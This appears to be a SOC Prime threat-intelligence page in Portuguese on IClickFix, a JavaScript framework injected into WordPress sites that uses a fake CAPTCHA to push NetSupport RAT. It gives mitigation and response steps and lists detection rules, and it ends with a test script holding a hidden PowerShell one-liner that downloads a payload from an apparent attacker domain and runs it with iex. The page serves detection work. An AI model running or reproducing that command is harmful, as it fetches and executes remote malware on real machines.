SOC Prime Bias: Medium

03 Feb 2026 18:25 UTC

Conheça o IClickFix: um framework amplamente difundido que tem como alvo o WordPress utilizando a tática ClickFix

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Conheça o IClickFix: um framework amplamente difundido que tem como alvo o WordPress utilizando a tática ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O relatório perfila IClickFix, um framework de JavaScript malicioso que compromete sites WordPress e apresenta um CAPTCHA falsificado no estilo do Cloudflare Turnstile. A armadilha coage os visitantes a executar um comando PowerShell que baixa e instala NetSupport RAT. A entrega é suportada por um sistema de distribuição de tráfego construído em torno do YOURLS encurtador de URL e um conjunto rotativo de domínios redirecionadores. Pesquisadores observaram mais de 3.800 sites WordPress comprometidos servindo essa cadeia globalmente desde o final de 2024.

Investigação

Analistas da Sekoia identificaram a tag JavaScript injetada ic-tracker-js em sites comprometidos e então reconstruíram o fluxo de redirecionamento através de múltiplos domínios de curta duração. Eles capturaram o padrão exato de execução do PowerShell usado para recuperar o payload final e recuperaram os componentes caídos do NetSupport RAT juntamente com indicadores de infraestrutura C2 associados.

Mitigação

Monitore o conteúdo da web para a ic-tracker-js injeção e bloqueie domínios maliciosos conhecidos, redirecionadores e serviços de links curtos usados na cadeia. Nos terminais, detecte padrões de download e execução do PowerShell consistentes com a armadilha ClickFix. Adicione cobertura para criação de arquivos do cliente NetSupport e para persistência através de Run chaves de registro no nível do usuário.

Resposta

Quando indicadores surgirem, isole o terminal, interrompa o processo ativo do PowerShell e remova os binários do NetSupport além de qualquer persistência baseada em registro. Siga com uma triagem forense completa para confirmar que o atacante não implantou implantes adicionais ou estabeleceu caminhos de acesso secundários.

Fluxo de Ataque

Detecções

Download ou Upload via Powershell (via cmdline)

Equipe SOC Prime
02 Fev 2026

Arquivos Suspeitos no Perfil de Usuário Público (via file_event)

Equipe SOC Prime
02 Fev 2026

A Possibilidade de Execução Através de Linhas de Comando do PowerShell Ocultas (via cmdline)

Equipe SOC Prime
02 Fev 2026

Uso Suspeito do Invoke-RestMethod (via powershell)

Equipe SOC Prime
02 Fev 2026

Possível Tentativa de Execução de Binário Gerente NetSupport de Diretório Suspeito (via process_creation)

Equipe SOC Prime
02 Fev 2026

Possíveis Pontos de Persistência [ASEPs – Software/NTUSER Hive] (via registry_event)

Equipe SOC Prime
02 Fev 2026

IOCs (HashSha256) para detectar: Conheça o IClickFix: um framework direcionado a WordPress usando a tática ClickFix

Regras AI da SOC Prime
02 Fev 2026

IOCs (DestinationIP) para detectar: Conheça o IClickFix: um framework direcionado a WordPress usando a tática ClickFix

Regras AI da SOC Prime
02 Fev 2026

IOCs (SourceIP) para detectar: Conheça o IClickFix: um framework direcionado a WordPress usando a tática ClickFix

Regras AI da SOC Prime
02 Fev 2026

Detecção de Injeção de JavaScript Malicioso IClickFix [Servidor Web]

Regras AI da SOC Prime
02 Fev 2026

Execução de Comando PowerShell para Entrega do NetSupport RAT [PowerShell do Windows]

Regras AI da SOC Prime
02 Fev 2026

Execução de Simulação

Pré-requisito: O Telemetria & Baseline Pre‑flight Check deve ter passado.

  • Narrativa e Comandos do Ataque:

    Um adversário que tem acesso inicial ao terminal deseja estabelecer uma presença permanente entregando o NetSupport RAT. Para evadir a detecção interativa, eles lançam o PowerShell em modo oculto sem perfil ou logo (-w hidden -nop -c). Eles então usam Invoke‑WebRequest (iwr) para baixar um payload JSON malicioso (tytuy.json) que contém um script PowerShell para o RAT. O script é escrito no diretório temporário e executado via Invoke‑Expression. Esta linha de comando exata corresponde às strings que a regra Sigma monitora.

  • Script de Teste de Regressão:

    # One-liner PowerShell que corresponde à regra de detecção
    $url = 'https://scottvmorton.com/tytuy.json'
    $out = "$env:TEMPpayload.ps1"
    
    powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)"
  • Comandos de Limpeza:

    # Remove o payload baixado e qualquer processo PowerShell remanescente
    Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue
    Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force